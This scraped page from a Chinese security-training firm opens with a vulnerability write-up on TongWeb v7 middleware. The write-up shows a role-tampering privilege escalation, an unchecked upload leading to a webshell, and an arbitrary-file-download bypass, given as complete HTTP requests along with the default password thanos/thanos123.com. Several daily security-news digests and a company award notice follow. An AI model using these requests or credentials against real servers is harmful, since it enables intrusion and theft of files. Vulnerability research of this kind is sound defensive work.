TongWeb闭源中间件代码审计
应用服务器 TongWeb v7 全面支持 JavaEE7 及 JavaEE8规范,作为基础架构软件,位于操作系统与应用之间,帮助企业将业务应用集成在一个基础平台上,为应用高效、稳定、安全运行提供关键支撑,包括便捷的开发、随需应变的灵活部署、丰富的运行时监视、高效的管理等。 本文对该中间件部分公开在互联网,但未分析细节的漏洞,进行复现分析: sysweb后台上传getshell: 在互联网搜索发现该版本存在sysweb后台文件下载,可惜却没有复现细节,且访问显示如下: 发现通过默认口令thanos/thanos123.com无法登录,且未发现任何相关的默认口令: 于是自己找到配置文件查看权限校验情况: \sysweb\WEB-INF\web.xml: 发现配置情况如上,一切/*请求均需要admin权限才行,但目前互联网暂未发现任何其他相关权限账号,自己尝试admin相关弱口令也均为成功,于是继续寻找用户相关功能点: 点击安全服务--安全域管理: 点击该安全域:找到默认账户的thanos用户: 点击保存,查看数据包: 发现该账户的userRole为tongweb与sysweb要求的admin并不匹配,于是点击创建用户: 但并未发现可以随意设置用户的useRole,于是点击保存,并拦截数据包: 将空白的userRole设置为admin,并放包: 发现创建成功。于是尝试sysweb登录: 发现仅仅是如上页面,但是至少权限问题解决了。 接着返回sysweb的配置文件: 跟进分析: 发现未进行任何校验过滤,直接通过parseFileName()方法解析header获取文件名赋值给fileName。 构造如下文件上传数据包: 上传成功,shell加一: 任意文件下载漏洞: 默认账号密码:thanos/thanos123.com登录后台,在快照管理处存在下载功能点: 点击下载抓包查看: 下载文件打包成压缩包下载: 如上,疑似存在下载漏洞,跟进路由: 如上,先找到类级别的路径位置,注解表示由/rest/monitor/snapshots根路径发起的请求均会被该类处理。 随后再找到方法级别的路由位置,download的post请求均会被该方法处理: 可见该方法接收了前面数据包传输的参数filename,并赋值给snapshotname参数。 分析如上代码存在以下路径: Path:根路径,由system.getProperty/temp/download组成 snapshotRootPath:由path/snapshotname组成。 随后进入AgentUtil.receiveFileOrDir()进行目标文件压缩,下载,且此处未进行任何校验: 但如果直接修改数据包filename进行任意文件下载依然会失败,因为紧接着代码进行了如下校验: 判断下载路径snapshotRootPath的父路径是否是path,也就是对snapshotname与path拼接后的路径进行校验,如果snapshotname值为../../或者为/a/b这种格式则无法通过校验,也就是限制了跨目录操作。 但回过头来查看具体下载操作: 是通过fileOrDir路径与snapshotRootPath进行文件下载的,查找location的值: 且发现location参数值可控: 于是先通过如下数据包修改location的值(修改为想任意下载的目录): POST /console/rest/monitor/snapshots/setLocation HTTP/1.1 Host: 192.168.73.130:9060 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json, text/javascript, \*/\*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 36 Origin: http://192.168.73.130:9060 Connection: keep-alive Referer: http://192.168.73.130:9060/console/rest Cookie: console-c-4aff-9=EABC776A7845EFBDA555BAA1D078F628; DWRSESSIONID=858h23g\$aEjH1iqRz1jnGBLe3rp snapshot_location=D%3A%5CTongWeb7.42 随后再进行下载: POST /console/rest/monitor/snapshots/download HTTP/1.1 Host: 192.168.73.130:9060 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 39 Origin: http://192.168.73.130:9060 Connection: keep-alive Referer: http://192.168.73.130:9060/console/pages/monitor/snapshot.jsp Cookie: console-c-4aff-9=429BD65834FAD60D489BC2F36DAF93C5; DWRSESSIONID=jvSHNTT66zO2\$Hjyb4sFS7vYdrp Upgrade-Insecure-Requests: 1 Priority: u=4 filename=conf 如下,下载成功:
网络安全日报 2025年06月23日
1、Banana Squad利用虚假的GitHub开源项目传播窃密木马 https://hackread.com/banana-squad-data-stealing-malware-github-repositories/ 安全公司ReversingLabs近日披露,名为Banana Squad的威胁团伙利用虚假的GitHub开源项目传播窃密木马,目标锁定开发者及使用Python工具的用户。该团伙自2023年4月起便活跃于多个开源平台,曾大规模上传恶意软件包,此轮攻击再次表明开源生态系统面临的持续安全威胁。研究人员发现,该组织在GitHub上创建了60多个伪装成黑客工具或Python脚本的项目仓库,但其中嵌入了窃密后门代码。这些恶意项目多由“空壳”用户账号托管 2、史上规模最大的数据泄露事件泄露超过160亿条账户凭据 https://securityaffairs.com/179149/data-breach/researchers-discovered-the-largest-data-breach-ever-exposing-16-billion-login-credentials.html 研究人员近日披露了一起有史以来规模最大的登录信息泄露事件,涉及超过160亿条账户凭据。这些数据大多来源于信息窃取类恶意软件(infostealer),通过多个不安全的Elasticsearch或开放存储实例短暂暴露,现已对全球用户构成重大威胁。此次泄露由CyberNews团队在持续监测中发现,包含30个不同来源的 3、朝鲜黑客利用AI换脸视频诱骗员工感染恶意软件 https://www.bleepingcomputer.com/news/security/north-korean-hackers-deepfake-execs-in-zoom-call-to-spread-mac-malware/ 安全公司Huntress披露,朝鲜APT组织BlueNoroff近期利用AI深度伪造(deepfake)视频伪装公司高管,在Zoom会议中诱导企业员工安装定制的macOS恶意软件。这一攻击于2025年6月被发现,目标是一家科技公司的员工,攻击者通过Telegram冒充外部专家发送会议链接,实则引导受害人访问伪造的Zoom网站并下载安装恶意AppleScrip 4、Godfather银行木马通过虚拟化运行银行应用程序窃取数据 https://www.govinfosecurity.com/godfather-malware-turns-real-banking-apps-into-spy-tools-a-28740 安全研究人员披露,移动银行木马“Godfather”已升级为具备虚拟化能力的高隐蔽性恶意软件,能够在Android设备上创建沙箱环境,运行真实银行和加密货币应用,从而实现实时控制和数据窃取。Zimperium实验室指出,该木马通过安装包含VirtualApp或Xposed等虚拟化框架的“宿主”应用,在用户手机中建立隐藏的并行空间,克隆并执行正版金融App。不同于传统伪装的覆盖攻击手法,Godfathe 5、攻击者利用Cloudflare隧道隐匿传播Python恶意代码 https://www.theregister.com/2025/06/19/sneaky_serpentinecloud_slithers_through_cloudflare/ 近期Securonix研究人员揭露了一场代号为Serpentine#Cloud的持续性恶意软件攻击活动,攻击者借助Cloudflare隧道服务在全球多个行业展开大规模渗透,利用Python恶意代码实现对受害系统的持久控制。该活动通过伪装成PDF文件的Windows快捷方式(.lnk)启动攻击链,逐步执行包含VBScript、批处理脚本及Python代码的多阶段加载流程,最终在内存中运行Donut封装的RAT后门( 6、微软加强Windows 365 Cloud PC默认安全策略 https://www.bleepingcomputer.com/news/security/microsoft-unveils-new-security-defaults-for-windows-365-cloud-pcs/ 微软近日宣布将于2025年下半年起对新建与重建的Windows 365 Cloud PC启用一系列默认安全强化措施,旨在进一步降低数据泄露与恶意软件攻击风险。新策略包括默认禁用剪贴板、驱动器、USB与打印机的重定向功能,防止用户在本地设备与云桌面间传输文件,从而阻止恶意软件传播与敏感数据外泄。USB重定向禁用仅限于底层设备访问,高层接口设备如鼠标、键盘与摄像头将不受影 7、黑客利用搜索参数注入在正规网站植入虚假客服电话 https://hackread.com/scammers-fake-support-numbers-real-apple-netflix-paypal/ 研究人员发现,一种新型网络诈骗正通过“搜索参数注入”攻击手法,在苹果、Netflix、PayPal等知名企业官网页面上插入虚假的客服号码,诱导用户主动拨打,从而窃取敏感信息。该技术被Malwarebytes的高级研究主管Jérôme Segura曝光,目前已波及包括Bank of America、微软、Facebook等多个主流平台。攻击通常以Google搜索中的广告链接为入口,用户点击后虽确实进入了官方网站,但由于搜索功能未对输入参数进 8、攻击者通过GitHub平台传播针对Minecraft玩家的恶意软件 https://research.checkpoint.com/2025/minecraft-mod-malware-stargazers/ Check Point研究人员披露,一种专门针对Minecraft玩家的多阶段恶意软件近期通过GitHub平台传播,伪装成作弊工具如Oringo和Taunahi模组,诱导用户下载安装。该攻击活动由名为Stargazers Ghost Network的恶意分发即服务平台(DaaS)支持,利用Java与.NET构建的信息窃取链条,对玩家的敏感信息进行窃取。此次攻击自2025年3月以来活跃,利用Minecraft模组社区的开放性和信任机制,将恶意JAR文件伪 9、美国司法部追回投资诈骗中被盗的2.25亿美元加密货币 https://www.bleepingcomputer.com/news/legal/us-recovers-225-million-of-crypto-stolen-in-investment-scams/ 美国司法部查获了与投资欺诈和洗钱活动有关的超过2.25亿美元的加密货币,这是美国特勤局历史上最大的加密货币查获案。此次行动由联邦调查局(FBI)特勤局联合区块链分析公司TRM Labs及稳定币发行商Tether共同完成,揭露了一个利用复杂链上交易网络洗钱的跨国犯罪集团。涉案犯罪集团通过虚假加密货币投资平台诱导受害者,谎称提供高回报理财项目,实际实施“杀猪盘”诈骗。据司法部公告,全球至 10、英国拟建立国家数据图书馆对AI治理的启示 https://www.secrss.com/articles/80034 1月13日,英国首相斯塔默宣布“人工智能机遇行动计划”,其中提到创建国家数据图书馆以安全可靠地释放公共数据的价值,支持人工智能的发展。近期,英国托尼·布莱尔全球变革研究所发布《Governing in the Age of AI》报告,提出建立国家数据图书馆,以解决英国现有数据基础设施落后的问题,消除数据访问的系统性障碍,充分释放数据在驱动AI创新发展中的潜力。当前,英国公共部门数据面临数据分散、数据访问成本高、数据安全性不足等突出挑战。为打破这一困境,国家数据图书馆被视为英国数字化转型议程的核心支柱。本文通过分析英 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月20日
1、攻击者利用Instagram上的虚假银行广告实施金融诈骗 https://www.malwarebytes.com/blog/news/2025/06/fake-bank-ads-on-instagram-scam-victims-out-of-money 近日,网络安全研究者发现多个假冒加拿大主要金融机构(如BMO银行和EQ Bank)的Instagram广告正在诱骗用户访问伪造网站并泄露敏感信息。这些广告不仅高仿银行官方页面与色彩设计,还通过AI生成的深度伪造视频冒充知名投资策略师,如BMO首席投资策略师Brian Belski,以增强可信度。部分假广告声称提供“4.5%利率”,但实际上跳转至钓鱼网站,伪装成EQ Bank登录页面,用以窃取银行 2、研究人员在Outlook登录页面中发现键盘记录器后门 https://www.helpnetsecurity.com/2025/06/17/researchers-unearth-keyloggers-on-outlook-login-pages/ 网络安全公司Positive Technologies的研究人员警告称,未知威胁行为者已经成功入侵多个国家政府机构和企业的Microsoft Exchange服务器,并在Outlook on the Web(OWA)登录页面中注入了基于浏览器的键盘记录器(keylogger),用于窃取用户输入的登录凭证。研究人员发现,攻击者在OWA页面中植入了两类JavaScript键盘记录器:一类记录用户输入的凭 3、Veeam修复远程代码执行漏洞防止域用户入侵备份服务器 https://www.bleepingcomputer.com/news/security/new-veeam-rce-flaw-lets-domain-users-hack-backup-servers/ Veeam于今日发布紧急安全更新,修复多个Veeam Backup & Replication(VBR)中的安全漏洞,其中最严重的是一个允许远程代码执行(RCE)的高危漏洞CVE-2025-23121。该漏洞由watchTowr和CodeWhite的安全研究人员报告,影响所有加入域的VBR安装版本(12及以上)。攻击者只需是认证的域用户,即可在低复杂度攻击中远程执行任意代码,控制备份服 4、Sitecore CMS漏洞利用链可实现未授权远程代码执行 https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform/ 安全研究团队watchTowr近日披露了影响Sitecore Experience Platform(XP)内容管理系统的一组高危漏洞,这些漏洞可被链式利用,实现完全的未经认证的远程代码执行(RCE)。Sitecore广泛部署于银行、航空公司和跨国企业等关键基础设施中,因此此次漏洞披露引发了高度关注。漏洞链的第一步源于一个内置账户sitecore\ServicesAPI,其默认密码被硬编码为简单的“b 5、Bing搜索结果暗藏恶意广告,伪装PuTTY传播勒索软件 https://www.freebuf.com/articles/system/435383.html 网络安全专家近日发出警告,攻击者正通过恶意广告传播伪装成 PuTTY 的恶意软件,专门针对系统管理员群体。这一新型威胁标志着攻击方式的重大转变——恶意广告已超越传统钓鱼手段,成为恶意软件传播的主要渠道。ExpelSecurity 安全团队发现,当前攻击活动专门针对搜索 PuTTY(系统管理员常用的 SSH 和 telnet 客户端)的用户。攻击者精心策划,将恶意广告置顶于 Bing 搜索结果,这些广告看似指向正规 PuTTY 网站,实则会将访问者重定向至攻击者控制的恶意站点。 6、水咒组织利用76个GitHub账号发起多阶段恶意软件攻击 https://thehackernews.com/2025/06/water-curse-hijacks-76-github-accounts.html 网络安全组织"水咒"利用76个GitHub账号分发多阶段恶意软件,窃取凭证、远程控制并长期驻留。攻击采用混淆脚本、反调试技术,通过合法云服务逃避检测,欧洲多国已遭针对性攻击。 7、新型恶意软件滥用Cloudflare隧道投递RAT https://thehackernews.com/2025/06/new-malware-campaign-uses-cloudflare.html 新型SERPENTINE#CLOUD攻击利用Cloudflare Tunnel托管恶意载荷,通过钓鱼邮件传播,采用多阶段感染链最终执行内存注入式RAT。攻击滥用信誉子域名规避检测,目标覆盖欧美亚多国。同时Shadow Vector活动通过SVG走私技术攻击哥伦比亚,部署远程木马。社会工程攻击激增,ClickFix技术利用用户操作完成感染。 8、Asana MCP AI 连接器漏洞可能泄露企业数据 https://www.csoonline.com/article/4009373/asanas-mcp-ai-connector-could-have-exposed-corporate-data-csos-warned.html Asana的MCP服务器漏洞可能泄露企业数据,涉及项目、任务等敏感信息。专家警告MCP协议尚不成熟,建议限制数据访问并采用更安全的RAG方案。企业应加强租户隔离、日志记录和人工监督,避免过早部署新协议。 9、Traffic Server 漏洞可致攻击者通过内存耗尽发动DoS攻击 https://cybersecuritynews.com/apache-traffic-server-vulnerability-2/ Apache Traffic Server存在高危漏洞CVE-2025-49763,攻击者可利用ESI插件内存耗尽发动远程DoS攻击,影响9.0.0-9.2.10和10.0.0-10.0.5版本。建议立即升级并配置max-inclusion-depth参数缓解风险。 10、黄金SAML攻击:攻击者可窃取联合服务器私钥掌控全局身份系统 https://cybersecuritynews.com/golden-saml-attack-let-attackers-gains-control/ 黄金SAML攻击利用窃取的私钥伪造身份令牌,威胁企业整个身份系统,隐蔽且持久。虽罕见但破坏力极强,能绕过传统安全检测,需高度警惕。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月19日
1、攻击者利用Hacklink黑产平台发动SEO投毒攻击 https://hackread.com/hacklink-market-seo-poisoning-attacks-google-results/ 网络安全研究机构Netcraft近日披露,一项利用“Hacklink”黑产平台发动的SEO投毒攻击正在全球范围扩散,攻击者通过入侵网站并植入隐形恶意链接,借助Google搜索引擎将钓鱼网站、假冒服务及恶意内容推至搜索结果前列,欺骗用户点击。与传统入侵不同,此类攻击并不篡改网页内容,而是悄悄向被入侵网站注入隐藏代码,使搜索引擎误判其可信度。攻击目标集中在赌博、医药与成人内容等高流量关键词,尤以土耳其的线上博彩行业为重灾区。一些攻击团伙如“Neon 2、斯堪尼亚确认保险理赔数据泄露并遭遇勒索威胁 https://www.bleepingcomputer.com/news/security/scania-confirms-insurance-claim-data-breach-in-extortion-attempt/ 斯堪尼亚,这家隶属于大众集团的瑞典重型卡车和发动机制造巨头,近日确认其金融服务系统遭遇网络攻击。攻击者利用被窃取的外部IT合作伙伴账户凭据入侵系统,窃取了保险理赔相关文件。事件发生于2025年5月28日至29日,黑客通过密码窃取恶意软件获得合法用户凭据,从而访问了“insurance.scania.com”这一保险业务应用。被盗文件可能包含个人敏感信息和财务医疗数据,具 3、23andMe因泄露数百万用户基因数据被英国罚款230万英镑 https://www.theregister.com/2025/06/17/23andme_ico_fine/ 英国信息专员办公室(ICO)对基因检测公司23andMe处以230万英镑罚款,因其2023年发生的大规模数据泄露事件暴露了近700万用户的敏感遗传信息。调查发现23andMe存在多项安全缺陷,包括缺乏强制多因素认证(MFA)、密码安全不足、未采取有效措施防止访问和下载原始基因数据,以及未能及时监控和响应安全威胁。攻击期间,黑客通过凭证填充手法获取了约1.4万个账户访问权限,但由于用户广泛使用DNA亲属匹配功能,实际影响用户数高达690万。ICO批评23andMe对警告信号反应迟缓 4、Kali Linux新版本增加13款工具并强化汽车安全测试功能 https://www.bleepingcomputer.com/news/security/kali-linux-20252-released-with-13-new-tools-car-hacking-updates/ Kali Linux 2025.2版本现已发布,作为本年度第二次更新,该版本带来了13款新工具,并对汽车安全测试工具集进行了重命名与功能扩展,吸引了广大网络安全从业者和红蓝队测试人员的关注。本次更新中,原先的“CAN Arsenal”重命名为“CARsenal”,更贴近其作为汽车渗透测试工具的实际用途,同时界面也更加友好,新增了如ICSim模拟器、VIN解析器等实用模块。 5、亲以色列黑客组织声称破坏伊朗最大国有银行 https://www.govinfosecurity.com/pro-israel-hacking-group-claims-to-disrupt-irans-bank-sepah-a-28721 亲以色列黑客组织“掠食性麻雀”(Predatory Sparrow)宣称与伊朗境内协作者合作,对伊朗最大国有银行——Sepah银行发动网络攻击,导致其网站无法访问、ATM瘫痪、部分加油站无法完成支付。伊朗媒体Fararu随后证实银行遭遇网络攻击并导致服务中断。该银行在伊境内拥有1800家分支机构,并在欧洲多地设有分行。“掠食性麻雀”在社交媒体上发文称,Sepah银行为伊朗革命卫队服务,用民众资金 6、谷歌Gerrit代码平台漏洞致18个项目遭入侵 https://www.freebuf.com/articles/network/435349.html 安全研究人员发现编号为CVE-2025-1568的"GerriScary"高危供应链漏洞,攻击者可利用该漏洞向ChromiumOS、Chromium、Dart和Bazel等至少18个谷歌核心项目注入恶意代码。 7、邮件服务商Cock.li遭入侵,100万名用户数据泄露 https://www.freebuf.com/articles/database/435347.html 邮件托管服务商Cock[.]li近日发布官方声明,确认遭遇重大安全事件,导致超过100万用户的个人信息外泄。此次攻击主要针对该平台的Roundcube网页邮件系统,影响范围涵盖自2016年以来登录过网页邮箱的约1,023,800名用户。 8、CISA警告Linux内核权限提升漏洞正遭活跃利用 https://www.freebuf.com/articles/system/435322.html 美国网络安全和基础设施安全局(CISA)本周二将影响Linux内核的安全漏洞列入其已知被利用漏洞(KEV)目录,并确认该漏洞已在野遭到活跃利用。该漏洞编号为CVE-2023-0386(CVSS评分:7.8),是Linux内核中的所有权管理缺陷,攻击者可利用此漏洞在受影响系统上提升权限。该漏洞已于2023年初修复。 9、Linux PAM及udisks组件曝高危提权漏洞 https://www.freebuf.com/articles/system/435264.html Qualys威胁研究部门(TRU)近日披露了两个相互关联的权限提升漏洞——CVE-2025-6018与CVE-2025-6019。攻击者通过组合利用PAM(可插拔认证模块)配置缺陷和libblockdev/udisks堆栈漏洞,可轻松在多种Linux发行版上获取完整的root权限。研究人员将这一本地提权(LPE)漏洞称为"具有普遍性的重大威胁",因其利用门槛低且影响范围广泛。 10、华硕Armoury Crate漏洞让攻击者获得Windows管理员特权 https://www.anquanke.com/post/id/308565 ASUS Armoury Crate 软件中存在一个高严重性漏洞,可让威胁行为者在 Windows 机器上将其权限提升到 SYSTEM 级别。该安全问题被跟踪为 CVE-2025-3464,严重性评分为 8.8 分(满分 10 分)。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月18日
1、微软确认6月份Windows Server安全更新导致DHCP服务故障 https://www.bleepingcomputer.com/news/microsoft/microsoft-june-windows-server-security-updates-cause-dhcp-issues/ 微软近日确认,2025年6月的安全更新导致部分Windows Server系统上的DHCP服务出现故障,影响客户端IP续租。该问题涉及Windows Server 2016、2019、2022及2025版本,对应的更新补丁为KB5061010、KB5060531、KB5060526和KB5060842。受影响系统中,DHCP服务可能间歇性无响应,导致网络设备无法正确更 2、勒索团伙声称窃取Freedman HealthCare敏感文件 https://www.theregister.com/2025/06/16/extortionists_claim_freedman_healthcare_hack/ 勒索团伙近日宣称入侵了美国健康数据分析公司Freedman HealthCare,窃取了52.4GB、共计42204份敏感文件,计划于美国东部时间周二凌晨4点公开泄露。Freedman HealthCare服务对象包括多个州政府机构、保险公司及医疗提供方,参与了加州、特拉华州与罗德岛等地大规模医疗数据库的建设,涉及数千万居民的医保、诊疗和支付数据。一旦数据属实泄露,或将成为近年来最严重的医疗信息安全事件之一。勒索团伙此前曾威 3、印度共享出行平台Zoomcar泄露840万用户数据 https://www.bleepingcomputer.com/news/security/zoomcar-discloses-security-breach-impacting-84-million-users/ 印度共享出行平台Zoomcar于2025年6月9日披露,其系统遭到未授权访问,导致约840万用户数据泄露。此次事件是在攻击者向Zoomcar员工发送邮件主动宣称入侵后被发现的。虽然未对服务造成实质性中断,但Zoomcar确认用户的姓名、电话、车辆注册号、家庭地址和电子邮件等个人信息已被泄露。目前暂无证据显示财务信息或明文密码外泄,也未有勒索软件组织宣称对此负责。Zoomcar已 4、欧洲警方联合多国执法机构捣毁网络毒品交易平台 https://cyberscoop.com/archetyp-market-takedown-europe/ 欧洲刑警组织联合多国执法机构宣布捣毁自2020年以来运营的暗网网络毒品交易平台“Archetyp Market”,并在西班牙巴塞罗那逮捕了其30岁的德国籍站长。这一平台是欧洲存续时间最长、交易量最大的在线毒品市场之一,共有逾60万用户和17000个毒品商品列表,涉案交易额高达2.9亿美元,涵盖芬太尼、可卡因、MDMA、安非他命等高危毒品。此次名为“深哨行动(Operation Deep Sentinel)”的打击行动,动员了来自德国、荷兰、罗马尼亚、西班牙和瑞典等国的300多名执法 5、Gunra 勒索集团声称从美国医院泄露了40 TB数据 https://www.anquanke.com/post/id/308534 Gunra 勒索软件组织通过发布重大网络攻击的新证据,升级了对阿联酋迪拜首屈一指的医疗保健机构 American Hospital Dubai (AHD) 的攻击。该组织声称在 2025 年 6 月 4 日报告首次泄露事件后泄露了 40 TB 的敏感数据,包括个人人口统计数据、信用卡详细信息、阿联酋身份证号码、健康记录和内部文件。在此之前,他们声称泄露了 4.5 亿份患者记录,总计 4 TB 的未压缩数据,并威胁要在 6 月 8 日之前公开发布这些数据。 6、黑客积极利用LangFlow RCE漏洞部署Flodrix僵尸网络 https://www.anquanke.com/post/id/308540 安全研究人员通过 CVE-2025-3248 发现了一个针对 Langflow 服务器的活跃网络攻击活动,CVE-2025-3248 是一个关键的远程代码执行漏洞,允许威胁行为者部署复杂的 Flodrix 僵尸网络恶意软件。这些攻击表明,网络犯罪分子如何迅速将新披露的漏洞作为武器,以破坏云基础设施并扩大其僵尸网络作。 7、微软因安全漏洞禁用黑暗环境下的面部识别功能 https://www.freebuf.com/articles/system/435088.html 近期,微软在Windows 10和11系统中禁用了黑暗环境下使用Windows Hello面部识别的功能,此前安全研究人员发现了一个相关漏洞。该漏洞源于微软对对抗性输入扰动(adversarial input perturbations)的处理不足,这一安全疏漏可能让攻击者实施本地欺骗策略。微软将该漏洞评级为"重要",但目前尚无证据表明该漏洞已被实际利用。 8、OpenAI获五角大楼2亿美元合同,探索国防领域AI应用 https://www.freebuf.com/articles/ai-security/435071.html OpenAI今日宣布正与美国国防部合作开展试点项目,开发"前沿AI"(frontier AI)能力,但未透露具体研发内容。美国国防部在今日新授合同清单中确认了这一合作,披露将向OpenAI支付最高2亿美元项目经费,其中200万美元为预付款。国防部在文件中表示:"根据本协议,执行方将开发前沿AI原型能力,以应对作战和企业领域的关键国家安全挑战。" 9、CISA将苹果及TP-Link路由器漏洞列入已知被利用漏洞目录 https://www.freebuf.com/articles/network/435199.html 美国网络安全和基础设施安全局(CISA)近日将苹果产品漏洞及TP-Link路由器漏洞纳入其已知被利用漏洞(KEV)目录。以下是相关漏洞详情:CVE-2025-43200 苹果多款产品未明确漏洞、CVE-2023-33538(CVSS评分8.8)TP-Link多款路由器命令注入漏洞。 10、神秘厂商可以获得谷歌、脸书、币安等知名服务的短信验证码 https://www.secrss.com/articles/79856 一位业内举报者向《彭博商业周刊》提供了一批未公开的电话网络数据,内容涉及2023年6月期间约100万条含有双因素验证码的短信。这些短信全部经过了一家名为Fink Telecom Services的不知名瑞士公司。该公司及其创始人曾与政府情报机构和监控技术承包商合作,参与监控手机和追踪用户位置。网络安全研究人员与调查记者发布的多份报告曾指控Fink参与了多个私人在线账号被入侵事件。这些数据中包含了自动生成的登录验证码以及它们在传输至最终接收者过程中所经过的路径。发送方包括谷歌、Meta、亚马逊、多家欧洲银行、Tinde 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
荣耀登顶 | 蚁景科技勇夺第137届广交会测试赛团体冠军
近日,第137届广交会网络平台测试赛(第九期《方班演武堂》活动)圆满落幕,蚁景科技在这场激烈角逐中大放异彩,成功登顶,以团体总分第一名的成绩斩获桂冠。本次比赛由中国网络空间安全教育论坛(简称 “网教盟”)主办,吸引了众多高校和企业单位参与。蚁景科技在比赛中展现出了卓越的技术实力和团队协作精神,最终以总积分 546 分的绝对优势,首次荣膺广交会测试赛团体冠军。 此次比赛中,蚁景科技的精英讲师团队带领学员们全力以赴,在各个竞赛环节中均表现出色。特别是一叶讲师带领的小组,在本次比赛中脱颖而出,以出色的策略和精湛的技术为团队贡献了关键分数。在个人排行榜中,蚁景科技共有32名选手荣登榜单,其中一叶讲师以个人总积分第二名的成绩,成为比赛中的耀眼之星,进一步彰显了蚁景科技强大的人才储备和培养体系。  此前,蚁景科技已连续三届在广交会测试赛中稳坐亚军宝座,积累了丰富的竞赛经验和深厚的技术底蕴。此次历史性夺冠,是蚁景科技长期深耕网络安全技术研发与人才生态培育的必然成果。蝉联亚军的深厚积淀,在此刻转化为问鼎巅峰的磅礴力量。它不仅是对蚁景科技团队技术硬实力与协同作战能力的最佳认证,更是公司坚持“以赛促学、以战代练”、持续赋能学员实战技能、引领行业创新发展的最佳诠释。  从“亚”到“冠”的跨越,是蚁景科技攀登之路的新里程碑,我们将以此为新起点,继续加大核心技术攻关与人才培养投入,为筑牢国家网络安全防线、推动产业高质量发展贡献更强劲的“蚁景力量”! 关于蚁景科技 湖南蚁景科技有限公司,作为专业的“网络安全人才培养服务提供商”,致力于配合国家网络安全人才培养战略,精准对接行业人才市场的需求。公司秉承提升网络安全实战能力为核心的培养目标,紧密结合用人单位在网络安全岗位上的技能要求,提供前沿、系统且专业的网络安全实战技能培训。同时也针对政企单位、科研院所等行业客户,量身定制网络安全培训方案,以满足其特定的培训需求。 此外,蚁景科技紧密结合高校网络安全人才培养体系,基于对“互联网+教育”的精准把握,依托自主研发的网络安全人才实训平台——蚁景网安实验室,高效构建多样化的网络安全实验场景,全面满足高校教师的在线实验教学需求,同时也为网络安全爱好者提供了优质的在线实操学习环境。
网络安全日报 2025年06月17日
1、美国联网监控摄像头暴露数量居全球榜首 https://hackread.com/us-tops-list-unsecured-cameras-exposing-homes-offices/ 据网络安全公司BitSight TRACE研究报告披露,全球已有超过40000台联网监控摄像头在未采取任何身份验证措施的情况下公开暴露,实时画面可被任何人随意访问。其中,美国暴露设备数量最多,约为14000台,其次为日本、奥地利、捷克和韩国。相关设备分布广泛,既包括家庭监控、婴儿摄像头,也涉及工厂、办公楼、医疗机构等高敏感环境。BitSight指出,未经身份验证的摄像头可通过普通浏览器或常见RTSP路径访问,其风险不仅局限于隐私泄露,还可能被 2、全球超过46000个Grafana实例存在客户端开放重定向漏洞 https://www.bleepingcomputer.com/news/security/over-46-000-grafana-instances-exposed-to-account-takeover-bug/ 一项最新研究披露,全球超过46000个暴露于公网的Grafana实例仍未修补一个严重漏洞,可能被利用执行恶意插件并实现用户账户接管。该漏洞编号为CVE-2025-4123,由安全研究员Alvaro Balada发现,并已于今年5月21日通过官方补丁修复。Grafana是一款广泛用于基础设施与应用监控的开源可视化平台。然而,应用安全公司OX Security发现,截至目前,约3 3、Palo Alto Networks修复多个权限提升漏洞 https://securityaffairs.com/179000/security/palo-alto-networks-fixed-multiple-privilege-escalation-flaws.html Palo Alto Networks近期发布安全更新,修复了七个特权提升漏洞,并集成了最新的Chrome安全补丁,以提升旗下产品的整体防御能力。其中最严重的漏洞为CVE-2025-4232(CVSS评分7.1),影响macOS平台上的GlobalProtect客户端。该漏洞源于日志收集功能对通配符处理不当,允许非管理员用户通过代码注入手段将权限提升至root级别。另一关键漏洞 4、黑客涉嫌泄露10000名VirtualMacOSX用户数据 https://hackread.com/hackers-leak-virtualmacosx-customers-data-breach/ VirtualMacOSX被曝发生数据泄露事件,约1万名用户的敏感信息被公开发布在一个臭名昭著的网络论坛上。该论坛以数据库泄露和网络犯罪为主题,此次泄露的内容包括用户姓名、邮箱、密码、地址、电话号码及银行账户等财务信息,还有涉及用户交互内容的工单记录。泄露数据共包含3个文本文件,约17.6万行,由安全研究团队SafetyDetectives发现。VirtualMacOSX是一家提供基于云的苹果Mac系统服务的公司,客户遍布全球102个国家。虽然研究人员 5、恶意PyPI包伪装成Chimera模块窃取AWS、CI/CD及macOS数据 https://thehackernews.com/2025/06/malicious-pypi-package-masquerades-as.html 恶意PyPI包伪装成Chimera模块窃取AWS、CI/CD和macOS数据,多阶段攻击复杂;npm包隐藏恶意代码实施远程攻击;加密货币和区块链开发面临凭证窃取等威胁;AI编码催生新型供应链攻击风险。 6、Blink路由器曝CVSS 9.8级漏洞,未授权攻击可获取root权限 https://securityonline.info/critical-blink-router-flaws-cvss-9-8-allow-remote-root-code-execution-via-unauthenticated-attacks/ 